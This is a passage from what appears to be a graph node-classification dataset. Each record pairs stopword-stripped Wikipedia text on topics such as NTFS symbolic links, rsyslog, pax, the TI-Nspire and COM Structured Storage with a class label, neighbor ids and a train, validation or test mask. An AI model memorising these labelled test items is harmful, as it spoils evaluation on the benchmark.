    "text": "Hunchback_(video_game):hunchback video game hunchback arcade game developed century electronics published 1983 game loosely based victor hugo novel hunchback notre dame player controls quasimodo set top castle wall player must guide hunchback left right avoiding obstacles series non-scrolling screens goal screen ring church bell far right obstacles include pits must swung long rope ramparts must jumped contain knights spears flying fireballs arrows ducked jumped impose time limit screen knight climbs wall costing player life reach top eventually completing number screens player must rescue esmeralda final screen completed game begins faster speed hunchback character originally robin hood hence green costume game stages arrows artist drew robin hood character left company decision change theme hunchback time new artist taken green costume become accepted no-one questioned someone commented robin hood character drawn looked like hunchback ports released 1984 ocean software acorn electron amstrad cpc atari 8-bit family commodore 64 vic-20 dragon 32 oric zx spectrum ocean first arcade port spectrum version game reached number one uk sales charts version released superior software bbc micro 1984 originally unofficial clone ocean acquired home computer rights game reached agreement ocean could release acorn electron conversion developed superior continued sell bbc micro version released versions play sam 6 compilation 1988 msx port published 1985 home ports inspired two sequels hunchback ii quasimodo revenge hunchback adventure released ocean zx spectrum commodore 64 clones released 8-bit computers quasimodo 1983 synapse software atari 8-bit family great wall 1986 artic computing acorn electron bbc micro",
    "neighbors": [
      10931,
      9006
    ],
    "mask": "Validation"
  },
  {
    "node_id": 959,
    "label": 4,
    "text": "Killswitch_(film):killswitch film killswitch documentary film battle control internet movie collaboration director ali akbarzadeh producer jeffrey horn writer christopher dollar akorn entertainment premiered woodstock film festival october 2014 james k. lyons award best editing feature documentary made international debut playing alongside citizenfour international documentary film festival amsterdam november 2014 2015 screened capitol hill well film festivals four continents europe asia australia north america tech world excited democratic presidential candidate lawrence lessig role film kathy gill geekwire writes killswitch much dry recitation technical history director ali akbarzadeh producer jeff horn writer christopher dollar created human centered story large part connection comes lessig relationship swartz lawrence lessig tim wu peter ludlow frame story two young hackers aaron swartz edward snowden symbolize disruptive dynamic nature internet lives parallel one another free information take system putting directly cross-hairs powerful interests world swartz leads charge defeating stop online piracy act pays heavy price challenges mentor lawrence lessig take call lead crusade restore democracy snowden forced flee country ponder next move february 2015 killswitch invited screen capitol visitor center washington dc congressman alan grayson event held eve federal communications commission decision reclassify internet service providers title ii communications act 1934 congressman grayson harvard professor lawrence lessig free press ceo craig aaron paid homage aaron swartz committed suicide january 2013 prosecution various computer crimes spoke importance protecting free open internet",
    "neighbors": [
      10697,
      11659,
      4956,
      3495
    ],
    "mask": "Validation"
  },
  {
    "node_id": 960,
    "label": 6,
    "text": "NTFS_symbolic_link:ntfs symbolic link ntfs symbolic link symlink filesystem object ntfs filesystem points another filesystem object object pointed called target symbolic links transparent users links appear normal files directories acted upon user application exactly manner symbolic links directories volumes called junction points mount points introduced ntfs 3.0 shipped windows 2000 ntfs 3.1 onwards symbolic links created kind file system object ntfs 3.1 introduced together windows xp functionality made available ntfs.sys user mode applications third-party filter drivers masatoshi kimura opensource codice_1 driver could however installed make feature available user mode well ntfs.sys released windows vista made functionality available user mode applications default windows symbolic links files distinct windows symbolic links directories unlike ntfs junction point ntfs 3.1 symbolic link also point file remote smb network path ntfs junction points support absolute paths local drives ntfs symbolic links allow linking using relative paths additionally ntfs symbolic link implementation provides full support cross-filesystem links however functionality enabling cross-host symbolic links requires remote system also support effectively limits support windows vista later windows operating systems ntfs symbolic link windows shortcut file regular file latter may created filesystem earlier fat32 may contain metadata icon display shortcut viewed windows explorer transparent applications default security settings windows vista/windows 7 disallow non-elevated administrators non-administrators creating symbolic links behavior changed running secpol.msc local security policy management console security settings\\local policies\\user rights assignment\\create symbolic links worked around starting cmd.exe run administrator option codice_2 command starting windows 10 insiders build 14972 requirement elevated administrator privileges removed windows developer mode allowing symlinks created without needing elevate console administrator codice_3 command used create symbolic link built-in command codice_4 windows vista later command-syntax windows xp codice_11 utility mark russinovich capable working reparse points offered microsoft part sysinternals suite windows exposes createsymboliclink function api starting windows vista since codice_3 command depends codice_4 may possible use contexts codice_14 function uses aforementioned api implement soft link functionality using powershell community extensions also contains function codice_14 symbolic links point non-existent targets operating system check see target exists symbolic links work boot impossible redirect e.g windows installer fully support symbolic links redirected \\windows\\installer cause .msi-based windows installers fail error 2755 and/or error 1632 nevertheless possible redirect creating symbolic links \\users \\programdata pointing another drive recommended breaks updates windows store apps creating symbolic links \\users \\programdata \\program files \\program files x86 pointing locations breaks installation resp upgrade windows creating symbolic links \\program files \\program files x86 pointing another drive breaks windows component based servicing hardlinks files repository \\windows\\winsxs installation directory since windows xp uses ntfs format version later releases feasible enable symbolic links support using ntfs symbolic links windows 2000 xp third-party driver exists installing file system filter",
    "neighbors": [
      11270,
      2568,
      5643,
      4624,
      6674,
      537,
      8729,
      540,
      3102,
      9762,
      8227,
      8740,
      1577,
      10281,
      9780,
      2101,
      10812,
      3648,
      10310,
      1098,
      7754,
      10828,
      4173,
      4174,
      9808,
      4178,
      10839,
      603,
      9819,
      3170,
      622,
      1647,
      9839,
      4210,
      7796,
      1656,
      6265,
      7290,
      4731,
      10879,
      8834,
      6281,
      8841,
      6797,
      2193,
      9874,
      10900,
      4248,
      7838,
      9377,
      3235,
      4771,
      6820,
      1703,
      7847,
      2221,
      5300,
      7351,
      7356,
      2749,
      10428,
      2244,
      8391,
      200,
      9420,
      1741,
      1750,
      6358,
      9946,
      2782,
      9442,
      4836,
      4326,
      2279,
      1770,
      3308,
      10993,
      4850,
      7411,
      3834,
      6396,
      1791,
      8959,
      11519,
      3856,
      3351,
      8473,
      8985,
      11546,
      8988,
      9505,
      5413,
      808,
      3881,
      5928,
      10024,
      10026,
      10029,
      10033,
      1844,
      9525,
      11572,
      10039,
      6972,
      5437,
      7486,
      3394,
      8517,
      5969,
      3922,
      4439,
      5465,
      2402,
      2919,
      4458,
      6506,
      9066,
      9593,
      2943,
      3970,
      10631,
      1418,
      5003,
      5004,
      8080,
      11677,
      929,
      4001,
      11683,
      430,
      6062,
      7088,
      10673,
      9655,
      6584,
      1978,
      8132,
      6088,
      969,
      3535,
      8659,
      1498,
      5594,
      478,
      6114,
      6115,
      10727,
      6637,
      9709,
      2545,
      6641,
      11249,
      8692,
      3573
    ],
    "mask": "None"
  },
  {
    "node_id": 961,
    "label": 5,
    "text": "Rsyslog:rsyslog rsyslog open-source software utility used unix unix-like computer systems forwarding log messages ip network implements basic syslog protocol extends content-based filtering rich filtering capabilities flexible configuration options adds features using tcp transport official rsyslog website defines utility rocket-fast system log processing rsyslog uses standard bsd syslog protocol specified rfc 3164 text rfc 3164 informational description standard various incompatible extensions emerged rsyslog supports many extensions format relayed messages customized important extensions original protocol supported rsyslog rsyslog project began 2004 rainer gerhards primary author rsyslog decided write new strong syslog daemon compete syslog-ng according author new major player prevent monocultures provide rich freedom choice rainer gerhards worked rsyslog inside company adiscon gmbh rsyslog available number unix systems linux distributions among others",
    "neighbors": [
      5472,
      4033,
      6273,
      8933,
      1789,
      10924,
      142,
      7983,
      5397,
      11221,
      4663,
      2045
    ],
    "mask": "Test"
  },
  {
    "node_id": 962,
    "label": 4,
    "text": "Protection_papers:protection papers protection papers also known seamen protection papers seamen protection certificates sailor protection papers issued american seamen last part 18th century first half 20th century papers provided description sailor showed american citizenship issued american sailors prevent impressed british men-of-war period leading war 1812 certificates could issued fee 25 cents required proof citizenship although later changed require notarized affidavit citizenship protection papers also offered remained loyal crown american revolution day richard stockton captured general william howe written proclamation offering protection papers full free pardon willing remain peaceable obedience king george iii although many took pardon stockton never marched perth amboy put irons treated common criminal 1796 federal legislation regarding seaman protection certificates enacted merchant seamen protection papers used define freemen citizenship many black sailors men also used show freemen stopped officials slave catchers also called free papers certified non-slave status many problems protection papers descriptions often vague could apply almost anyone frederick douglass used protection paper free black sailor escape said custom state maryland require free colored people called free papers instrument required renew often charging fee writing considerable sums time time collected state papers name age color height form free man described together scars marks upon person could assist identification device slaveholding ingenuity like devices wickedness measure defeated itself—since one man could found answer general description hence many slaves could escape impersonating owner one set papers often done follows slave nearly sufficiently answering description set forth papers would borrow hire till could means escape free state mail otherwise return owner operation hazardous one lender well borrower failure part fugitive send back papers would imperil benefactor discovery papers possession wrong man would imperil fugitive friend therefore act supreme trust part freeman color thus put jeopardy liberty another might free however infrequently bravely done seldom discovered fortunate sufficiently resemble free acquaintances answer description papers one friend—a sailor—who owned sailor protection answered somewhat purpose free papers—describing person certifying fact free american sailor instrument head american eagle gave appearance authorized document protection hands describe bearer accurately indeed called man much darker close examination would caused arrest start review many protection papers reveals number black men sailors 1800 18 percent one hundred thousand americans sea african americans possible trace number african americans vessels belonging united states unknown number sailed nations seamen protection certificates drawn citizens —as specified blacks used claim citizenship commonly denied—so theory could seized nations records show great statistical variations depending port philadelphia baltimore proportions african americans hovered around 15 percent 1800 1860 new york percentage fell 14 18 percent annually 1830 7 8 percent 1830 1860 savannah georgia dropped around 13 percent 1830 2 percent 1836 proportion black mariners new orleans louisiana also fell averages high teens 1820 around 10 percent 1830s 1 7 percent 1840s 1850s many protection certificates general easy abuse system many impressment officers royal navy paid attention applying duplicate seaman protection certificate 1817 james francis stated 'had protection granted collector port 12 march 1806 torn destroyed british captain sea one way making specific describe tattoo highly personal thus use description identify seaman result many certificates carried information tattoos scars well specific information also perhaps led increase proliferation tattoos among american seamen frequently protection papers made reference tattoos clear evidence individual seafaring man rarely members general public adorn tattoos late eighteenth early nineteenth centuries tattoos much self-expression unique way identify sailor body lost sea impressed british navy best source early american tattoos protection papers issued following 1796 congressional act safeguard american seamen impressment proto-passports catalogued tattoos alongside birthmarks scars race height using simple techniques tools tattoo artists early republic typically worked board ships using anything available pigments even gunpowder urine men marked arms hands initials loved ones significant dates symbols seafaring life liberty poles crucifixes symbols seamen protection certificates discontinued 1940s forms identification american sailors instituted several reports united states house representatives united states senate demonstrated longer needed threat american freedom high seas began disappear protection certificates became valuable identification used 1940 seamen continuous discharge book replaced documents common items maritime collections important research sources american seamen",
    "neighbors": [],
    "mask": "Test"
  },
  {
    "node_id": 963,
    "label": 9,
    "text": "Comparison_of_programming_languages_(syntax):comparison programming languages syntax comparison programming languages compares features language syntax format 50 computer programming languages programming language expressions broadly classified four syntax structures programming language statements typically conventions statement separator used demarcate boundaries two separate statements statement terminator used demarcate end individual statement languages interpret end line end statement called line-oriented languages line continuation convention line-oriented languages newline character could potentially misinterpreted statement terminator languages allows single statement span one line line continuation generally done part lexical analysis newline normally results token added token stream unless line continuation detected import library way read external possibly compiled routines programs packages imports classified level module package class procedure ... syntax directive name attributes ... statements also classified whether syntactic convenience allowing things referred shorter name still referred fully qualified name without import whether actually required access code without impossible access code even fully qualified names block notation group two statements expressions units code related way comprise whole comments classified inline comments generally use newline character indicate end comment arbitrary delimiter sequence tokens indicate beginning comment examples block comments generally use delimiter indicate beginning comment another delimiter indicate end comment context whitespace newline characters counted delimiters examples abap supports two different kinds comments first character line including indentation asterisk codice_6 whole line considered comment single double quote codice_210 begins in-line commet acts end line abap comments possible statements codice_211 codice_212 native sql usages characters sql dialects double dash codice_213 used instead wide variety syntax styles declaring comments source code codice_214 italics used indicate block comment style codice_215 italics used indicate inline comment style",
    "neighbors": [
      512,
      5635,
      2062,
      6160,
      5651,
      9245,
      5165,
      5677,
      11310,
      8262,
      8775,
      1610,
      1611,
      9804,
      2652,
      8289,
      2666,
      7274,
      2670,
      3705,
      7292,
      9871,
      8854,
      3736,
      9881,
      155,
      7326,
      5796,
      4777,
      10413,
      5806,
      7343,
      3762,
      692,
      3765,
      5833,
      8397,
      7889,
      7894,
      7386,
      7395,
      8421,
      10470,
      4840,
      9454,
      4341,
      6910,
      5888,
      6414,
      10510,
      3856,
      11555,
      3876,
      4398,
      9008,
      8502,
      7479,
      10043,
      3904,
      10568,
      5961,
      8011,
      8524,
      847,
      3414,
      10586,
      11610,
      10083,
      6502,
      8554,
      10097,
      3442,
      3960,
      3462,
      8582,
      1931,
      5521,
      8082,
      10649,
      1435,
      6558,
      11683,
      5031,
      428,
      8628,
      7612,
      10684,
      6596,
      8644,
      7627,
      11212,
      11219,
      5588,
      2519,
      4057,
      477,
      4069,
      7658,
      6640,
      10739,
      1016,
      3577,
      2045
    ],
    "mask": "Validation"
  },
  {
    "node_id": 964,
    "label": 2,
    "text": "Control_Program_Facility:control program facility control program facility cpf operating system ibm system/38 cpf related ssp database management system integrated operating system system/38 advanced operating system lives ibm as/400 great efforts made ibm enable programs originally written system/34 /36 moved as/400 computers prior system/38 modern ones data stored disk stored separate logical files data added file written sector dedicated sector full new sector somewhere else system/38 adopted single-level store architecture main storage disk storage organized one abandoned ibm future systems project fs every piece data stored separately could put anywhere system thing physically contiguous file disk operating system managed storage recall data elements system/38 one commercial computers capability-based addressing earlier plessey 250 one computers capability architecture ever sold commercially capability-based addressing removed follow-on as/400 iseries models capability-based operating system refers operating system uses capability-based security",
    "neighbors": [
      2432,
      10883,
      4996,
      6148,
      2951,
      7053,
      9619,
      11673,
      6557,
      3359,
      10273,
      6442,
      7983,
      9139,
      6325,
      1593,
      573,
      1219,
      6342,
      11596,
      863,
      3938,
      5603,
      868,
      3429,
      5220,
      9829,
      375,
      2168,
      3323,
      2172,
      2813
    ],
    "mask": "None"
  },
  {
    "node_id": 965,
    "label": 6,
    "text": "Pax_(Unix):pax unix pax archiving utility created posix defined posix.1-2001 standard rather sort incompatible options crept codice_1 codice_2 along implementations across various versions unix ieee designed new archive utility could support various archive formats including new format basically tar additional extended attributes name pax acronym portable archive exchange command invocation structure somewhat unification codice_1 codice_2 pax four general modes invoked combination read write options table summarizes modal behaviour examples list contents archive extract contents archive current directory create archive current directory used codice_2 style codice_6 command used get list files archived copy current directory tree another location target directory must exist beforehand pax used similar manner either codice_2 codice_1 codice_2 syntax takes list files standard input stdin archiving already existing archive listing contents extracting files respectively possible invoke commands codice_1-like syntax well clarity completeness listing files archive copy mode option specifies archive use instead writing stdout reading stdin also note option using pax together find keeps pax traversing directory trees implementations pax use gzip bzip2 switches compression feature however specified posix important note pax append compressed archives example extracting gzipped archive due possibility using pax codice_2-like fashion possible use whatever compression program example xz used listing xz-compressed archive september 2009 version pax included linux distributions derivative old mirbsd pax supports following formats selectable via option notably pax format supported version pax implementations heirloom pax support formats including pax file format pax supports archiving multiple volumes end volume reached following message appears restoring archive multiple media pax asks next media fashion end media reached end archive despite standardized 2001 ieee 2010 pax enjoys relatively little popularity adoption pax required present conformant systems linux standard base since version 3.0 released july 6 2005 far linux distributions ship install default however distributions include pax separately installable package pax also present windows nt limited file archives tapes supported later moved interix subsystem support archiving restoring win32 acls packages handled installer os x often carry bulk contents archive.pax.gz file may read using pax utility",
    "neighbors": [
      515,
      9733,
      9735,
      3976,
      521,
      5256,
      6281,
      6664,
      4750,
      11663,
      8976,
      4369,
      5397,
      2198,
      6812,
      7196,
      4001,
      6138,
      2599,
      7847,
      811,
      8236,
      4398,
      7983,
      950,
      1336,
      8504,
      7356,
      451,
      1987,
      2245,
      8517,
      9542,
      10564,
      10623,
      5706,
      3659,
      8522,
      1741,
      4561,
      10967,
      9946,
      8675,
      10727,
      6120,
      491,
      8954,
      237,
      11249,
      4850,
      5106,
      5492,
      8306,
      8692,
      9204,
      10484,
      506,
      6908,
      5759
    ],
    "mask": "Test"
  },
  {
    "node_id": 966,
    "label": 9,
    "text": "TI-Nspire_series:ti-nspire series ti-nspire graphing calculator made texas instruments released july 2007 original ti-nspire developed ti plt shh1 prototype calculator derived casio classpad 300 ti-92 series calculators released 1995 ti-89 series calculators released 1998.the ti-nspire features non-qwerty keyboard different key-by-key layout compared predecessors ti-nspire allows users swap existing removable keypad functional copy ti-84 plus series keypad ti-nspire series i/o connector ti-nspire lab cradle another serves connector ti wireless network adapter mini-usb connector transferring data ti-nspire series available without computer algebra system 2011 texas instruments released cx line ti-nspire calculators effectively replaced previous generation updates included improvements original keyboard layout addition rechargeable lithium-ion battery 3d graphing capabilities reduced form factor ti got rid removable keypad generation therefore ti-84 compatibility mode 2019 ti-nspire cx ii added features boost clock speed improvements existing operating system ti-nspire series uses different operating system compared texas instruments calculators ti-nspire includes file manager lets users create edit documents result developed pda-esque devices ti-nspire retains many functional similarities computer standard ti-nspire calculator comparable ti-84 plus features functionality features ti-84 mode way replaceable snap-in keypad contains ti-84 plus emulator likely target secondary schools make use ti-84 plus currently textbooks cover ti-83 plus ti-84 plus lines allow transition ti-nspire line easily ti-nspire started development 2004 uses proprietary soc arm9 variant cpu ti-nspire ti-nspire cas calculators 32 mb nand flash 32 mb sdram 512 kb flash however 20 mb 16 mb user-accessible respectively ti-nspire released two models numeric cas version numeric similar features ti-84 except bigger higher resolution screen full keyboard feature numeric lacks ability solve algebraic equations indefinite integrals derivatives fill gap needing algebraic calculator texas instruments introduced second model name ti-nspire cas cas designed college university students giving feature calculating many algebraic equations like voyage 200 ti-89 ti-nspire intended replace however ti-nspire lack part ability programming installing additional apps previous models although limited version ti-basic supported along lua later versions c assembly possible ndless ti-nspire lacks qwerty keyboard acceptable use psat sat sat ii act ap ib exams ti-nspire cas calculator capable displaying evaluating values symbolically floating-point numbers includes algebraic functions symbolic differential equation solver desolve ... complex eigenvectors matrix eigvc ... well calculus based functions including limits derivatives integrals reason ti-nspire cas comparable ti-89 titanium voyage 200 calculators unlike ti-nspire compatible snap-in ti-84 plus keypad accepted sat ap exams without qwerty keyboard act ib british gcse level body color grey 8 march 2010 texas instruments announced new models ti-nspire touchpad ti-nspire cas touchpad graphing calculators united states new calculator listed ti website complement ti-nspire clickpad though introduced successor previous model countries calculators released alongside os 2.0 update featured number updates user interface new functions keyboards touchpad keypads featured different less crowded key layout along touchpad used navigation touchpad keypads also compatible older calculators running os 2.0 newer new calculators shipped touchpad keypads supported optional rechargeable battery second generation also available two models ti-nspire touchpad ti-nspire cas touchpad model maintained color normal one white black cas black gray reduce theft school-owned ti-nspire calculators texas instruments also introduced ez-spot teacher packs bright easy-to-spot school bus yellow frame slide case hardware versions differences cosmetic ti-nspire calculators released touchpad ti-nspires also ez-spot versions 2011 ti-nspire cx cx cas announced updates ti-nspire series thinner design thickness 1.57 cm almost half ti-89 1200 mah 1060mah 2013 rechargeable battery wall adapter included american retail package 320 240 pixel full color backlit display 3.2 diagonal os 3.0 includes features 3d graphing cx series released time frame casio prizm fx-cg10/20 casio color screen graphing calculator similar features ti-nspire cx series differ previous ti graphing calculator models cx series first use rechargeable 1060 mah lithium-ion battery upgraded 1200 mah 2013 rev. device charged via usb cable ti claims battery requires four hours charge full charge powers device two weeks normal daily use battery last 3 years requires replacement battery user-replaceable exception interchangeable ti-84 keypads cx series retain features previous ti-nspire models colors calculator still ti-nspire models cx white dark blue cx cas gray black external connectors changed slightly mini-usb port located center top ti-nspire series moved right cx series cx series ti added second port immediately left mini-usb port new wireless module new wireless ti-nspire navigator adapter allows teachers monitor students send files compatible previous ti-nspire models third port located bottom handheld ti charging dock lab cradle keypad layout similar ti-nspire touchpad models 100 mb user memory 64 mb ram retail package comes plastic blister case n't full manual teachers edition comes box ti-nspire cx poster classrooms full manual english french us devices ship student/teacher software windows/mac os x according texas instruments cx accepted sat ib ap act british gcse level exams cx cas accepted sat ap four models aimed chinese market launched specialized features four models chinese labeled keyboards cx-c cx-c cas models similar cx cx cas included concise chinese-english dictionary cm-c cm-c cas cheaper featured stream-lined design 32mb ram port wireless module systems chinese versions interchangeable international models 2019 texas instruments introduced ti-nspire cx ii ti-nspire cx ii cas feature slightly different operating system several enhancements slightly improved hardware like china continent europe also models aimed market calculators include -t cx cx-t ii cx-t ii cas different body color designs north american counterparts one main feature differences european versions inclusion exact math engine non-cas version european models also omit wifi adapter port top calculator texas instruments offers several different versions software calculators offer cas non-cas versions student teacher software software allows users share results classmates teachers gives user emulated version ti-nspire ti also offers computer link software connecting handheld computer transfer documents software allows syncing documents calculator and/or computer software requires license order used release os 3.0 lua scripting language supported allowing 3rd party programs run without need exploits.there currently 100 third-party programs functions nspire introduce new functionality like laplace transform fourier transform 3rd 4th degree differential equations n't included default ti-nspire lab cradle calculator-based laboratory system introduced 1994 portable data collection device life sciences cbl system replaced 1999 cbl 2 ti-nspire lab cradle three analog two digital inputs sampling rate 100,000 readings per second cradle also 32 mb storage space store sensor data.the lab cradle allows ti-nspire series communicate older calculator-based laboratory systems previous ti calculators used ti-73 series ti-82 ti-83 series ti-85 ti-86 ti-nspire lab cradle used rechargeable battery ti-nspire support three different charging options wall adapter usb cable computer ti-nspire cradle charging bay ti-nspire lab cradle marketed texas instruments developed part ongoing business venture ti vernier software technology portland oregon navigator system allows teachers connect multiple ti-nspire calculators computer ti-nspire access point ti-nspire navigator wireless cradles system includes ti-nspire cradle charging bay main system looks like wireless router navigator system first available first generation nspires launched ti-nspire cx cx cas released new wireless adapter announced smaller compatible ti-nspire ti-nspire touchpad press-to-test feature restricts access user documents certain features calculator limited time intended purpose prevent cheating tests exams press-to-test enabled pressing certain button combination turning calculator features blocked example 3d graphs drag drop graphs selectively enabled access existing documents always prohibited handheld running press-to-test mode led top blinks indicate press-to-test n't disabled press-to-test disabled connecting another calculator computer ti-nspire compatible software installed removing batteries pressing reset button disable ndless alternatively stylized ndl3ss third-party jailbreak ti-nspire calculators allows native programs c c++ arm assembly programs run ndless developed initially olivier armand geoffrey anneheim released february 2010 clickpad handheld organizations omnimaga ti-planet promoted ndless built community around ndless ndless programs ndless low-level operations accomplished example overclocking allowing handheld devices run faster downgrade prevention defeated well addition game boy game boy advance nintendo entertainment system emulators exist handhelds ndless.major ndless-powered programs also include port game doom unlike lua scripts supported texas instruments ndless actively counteracted ti subsequent os attempts block ndless operating texas instruments developed proprietary system-on-chip arm9 32-bit processors first generation ti-nspire based lsi corporation broadcom inc. zevio design cx cx ii generation built toshiba application-specific integrated circuit design texas instruments calculators contain non-volatile read-only memory called nand flash volatile random-access memory called synchronous dynamic random-access memory nand flash executable contains parts operating system however ti-nspire also uses rom store boot instructions operating system texas instruments likely free nand rom sdram calculator used user operating system nand rom sdram used store user operating system documents previous texas instruments calculators backup button cell battery used maintain user information system information time date battery changes allows user keep information battery removed ti-nspire lacks backup battery sdram content deleted whenever user swap battery necessitates calculator load operating system file structure nand flash sdram causing longer loading time despite overall performance increase versions ti-nspire performance differences exist ti-nspire cx ii version lacks 10+ mb storage space compared predecessor ti-nspire cm-c cm-c cas chinese versions cx cx cas respectively cheaper updated design 32mb ram port wireless module ti-nspire cx/cx cas calculators running os version 4.5.1.12 released april 2019 ti-nspire cx ii/cx ii cas running version 5.0.0 operating system updated frequently since 2007 partly due bugs missing functions also patch jailbreak exploits one year release 2006 version 2.0 3.0 4.0 5.0 major upgrades images included ti-nspire documents using computer software displayed nspire calculators full color nspire cx calculators graphs drawn top images data collection application included os use lab cradle 3d graphing supported well differential equations features also added including improvements functions related statistics os 3.0 also adds ability run programs written lua os 3.0.1 introduced number bugs fixed 3.0.2 os 3.2 conic equations standard formats graphed new chemistry feature chem box allows users write chemical notations os 3.2 also saw inclusion chipmunk physics engine use lua programs os 3.9 area curves calculated graph bar indicator displays angle mode degrees radians gradians effect current application window settings graphs exact inputs 7/3 2*π used input custom window settings",
    "neighbors": [
      477,
      7269,
      4777,
      797,
      9964,
      4334,
      2383,
      9463,
      4569,
      4186,
      7772,
      2045
    ],
    "mask": "None"
  },
  {
    "node_id": 967,
    "label": 2,
    "text": "Nokia_Xseries:nokia xseries nokia xseries line mobile phones nokia introduced september 2009 successor xpressmusic series targeted towards young audience focused music entertainment special dedicated keys inbuilt storage facilities x2-02 released january 2012 last handset series may 2018 hmd global launched new nokia x6 chinese market officially classified new member xseries",
    "neighbors": [
      1537,
      8577,
      3205,
      11655,
      9359,
      1424,
      529,
      2449,
      8083,
      10770,
      5143,
      2072,
      7063,
      5274,
      5019,
      5659,
      669,
      8472,
      11545,
      4003,
      4132,
      6310,
      167,
      40,
      3626,
      5290,
      10410,
      10802,
      7220,
      821,
      5175,
      7866,
      1728,
      7617,
      4291,
      7877,
      10053,
      199,
      9292,
      7246,
      1615,
      4305,
      5201,
      6996,
      7253,
      854,
      6870,
      10583,
      5211,
      6748,
      1633,
      9443,
      3300,
      4324,
      7399,
      8423,
      6505,
      10599,
      109,
      5998,
      8433,
      1533
    ],
    "mask": "None"
  },
  {
    "node_id": 968,
    "label": 3,
    "text": "UGV_Interoperability_Profile:ugv interoperability profile ugv interoperability profile ugv iop robotics autonomous systems – ground iop ras-g iop simply iop originally initiative started united states department defense dod organize maintain open architecture interoperability standards unmanned ground vehicles ugv primary goal initiative leverage existing emerging standards within unmanned vehicle uxv community society automotive engineers sae as-4 joint architecture unmanned systems jaus standard army unmanned aircraft systems uas project office iops iop initially created u.s. army robotic systems joint project office rs jpo currently maintained u.s. army project manager force projection pm fp plural form interoperability profiles iops typically refers set documents comprise iop intended usage iops approved public release national advanced mobility consortium namc makes iops available https //namcgroups.org website registered users system perspective iop defined address interoperability multiple levels within varying systems configurations e.g key solution utilization jaus establish common message passing layer software components system iop specifies rules use standard jaus messages well custom extensions standard message set interoperability hardware components iop also includes specification hardware plugs mounts dod intends publish revisions iop every year current version iop version 2.0 iopv2 release version 3.0 scheduled end 2017 since version 3.0 whole set iop documents auto-generated xml files iops consist following documents validate conformance ugv components iop attributes jaus profiling rules tardec developed software tool called conformance validation tool cvt cvt client tool checks interface jaus messages protocol state required jaus services cvt uses original iop xml-files generate test messages thus cvt considered iop reference implementation nato team experts ugv recommended iop become nato stanag proposal considered nato land capability group land engagement lcg le prove applicability iop military robots nato team experts ugv conducted several interoperability exercises demonstrations several robotics companies already support iop-compliant interfaces software hardware products several academic robotics contests like iop challenge intelligent ground vehicle competition european robotics hackathon enrich recommend require iop common interface definition iop relies message passing architecture jaus iop-compliant software connected robotics middlewares translating software bridges studies shown iop-compliant software coexist ros-based robotics software",
    "neighbors": [
      2948,
      5029,
      6419,
      3412,
      10494,
      479
    ],
    "mask": "Test"
  },
  {
    "node_id": 969,
    "label": 2,
    "text": "COM_Structured_Storage:com structured storage com structured storage variously also known com structured storage ole structured storage technology developed microsoft part windows operating system storing hierarchical data within single file strictly speaking term structured storage refers set com interfaces conforming implementation must provide specific implementation specific file format fact structured storage implementation need store data file addition providing hierarchical structure data structured storage may also provide limited form transactional support data access microsoft provides implementation supports transactions well one called simple-mode storage latter implementation limited ways well although performs better structured storage widely used microsoft office applications although newer releases starting office 2007 use xml-based office open xml default also important part com related object linking embedding ole technologies notable applications structured storage include sql server windows shell many third-party cad programs structured storage addresses inherent difficulties storing multiple data objects within single file one difficulty arises object persisted file changes size due update application reading/writing file expects objects file remain certain order everything following object representation file may need shifted backward make room object grows forward fill space left object shrinks file large could result costly operation course many possible solutions difficulty often application programmer want deal low level details binary file formats structured storage provides abstraction known stream represented interface codice_1 stream conceptually similar file codice_1 interface provides methods reading writing similar file input/output stream could reside memory within file within another stream etc. depending implementation another important abstraction storage represented interface codice_3 storage conceptually similar directory file system storages contain streams well storages application wishes persist several data objects file one way would open codice_3 represents contents file save objects within single codice_1 one way accomplish latter standard com interface codice_6 ole depends heavily model embed objects within documents microsoft implementation uses file format known compound files widely deployed structured storage implementations read write format compound files use fat-like structure represent storages streams chunks file known sectors may may correspond sectors underlying file system allocated needed add new streams increase size existing streams streams deleted shrink leaving unallocated sectors sectors reused new streams following applications use ole structured storage compound document format beta testing phase windows 2000 included feature titled native structured storage nss storage structured storage documents like binary microsoft office formats codice_7 file windows explorer uses cache thumbnails stream makes document stored separate ntfs data stream included utilities automatically split streams regular structured storage document ntfs data streams vice versa however feature withdrawn beta 3 due incompatibilities os components nss files automatically converted single data stream format",
    "neighbors": [
      11270,
      5643,
      4624,
      537,
      540,
      3102,
      9762,
      8227,
      8740,
      1577,
      10281,
      2101,
      10812,
      3648,
      10310,
      1098,
      7754,
      10828,
      4173,
      4174,
      9808,
      4178,
      10839,
      603,
      9819,
      3170,
      622,
      9839,
      4210,
      7796,
      1656,
      6265,
      7290,
      4731,
      10879,
      8841,
      6797,
      2193,
      9874,
      10900,
      4248,
      7838,
      9377,
      3235,
      4771,
      6820,
      1703,
      2221,
      5300,
      7351,
      10428,
      2749,
      2244,
      8391,
      200,
      9420,
      2782,
      9442,
      4836,
      4326,
      2279,
      1770,
      3308,
      10993,
      242,
      3834,
      1791,
      8959,
      11519,
      3856,
      11030,
      3351,
      8473,
      8985,
      11546,
      8988,
      5413,
      5928,
      3881,
      10024,
      10026,
      10029,
      7983,
      11571,
      1844,
      9525,
      11572,
      10039,
      6972,
      3394,
      3922,
      4439,
      5465,
      2402,
      2919,
      4458,
      6506,
      9066,
      9593,
      2943,
      2432,
      9609,
      1418,
      5003,
      5004,
      8080,
      11677,
      929,
      11683,
      430,
      6062,
      10673,
      9655,
      6584,
      1978,
      960,
      8132,
      6088,
      3535,
      8659,
      1498,
      5594,
      478,
      479,
      6114,
      6115,
      6637,
      9709,
      6641,
      3573
    ],
    "mask": "Test"
  },
  {
    "node_id": 970,
    "label": 7,
    "text": "Really_Simple_Systems:really simple systems really simple systems crm cloud crm provider offering crm systems small medium sized companies company states mission everything small business needs manage sales marketing really simple systems crm founded 2004 john paterson former ceo zeus technology coo systems union public launch january 2006 really simple systems crm 17,000 users hosted customer relationship management systems customers include royal academy red cross nhs ibm well thousands small medium sized companies company headquartered united kingdom office australia company software satisfaction awards best small business crm system twice 2008 2010 2011 company eurocloud award database marketing award 2014 best cloud application annual eurocloud awards finalist crm idol november 2017 pc mag listed really simple systems best lead management software article 2018 company finalist small businesss awards business innovation devops excellence awards 2019 2018 company listed 40 100 best tech companies uk g2 crowd october 2006 company marketing module launched initially offering campaign management email marketing added august 2012 october 2010 company launched free edition freemium two user hosted crm system existing product renamed enterprise edition may 2013 company accredited entry uk government gcloud cloudstore catalogue john paterson ceo really simple systems awarded crm idol citizen year 2014 july 2013 really simple systems launched cross-platform version crm running seamlessly desktops laptops tablets smartphones january 2015 company upgraded email marketing offer built-in alternative third party products mailchimp constant contact version 5 launched march 2017 offered new user interface custom 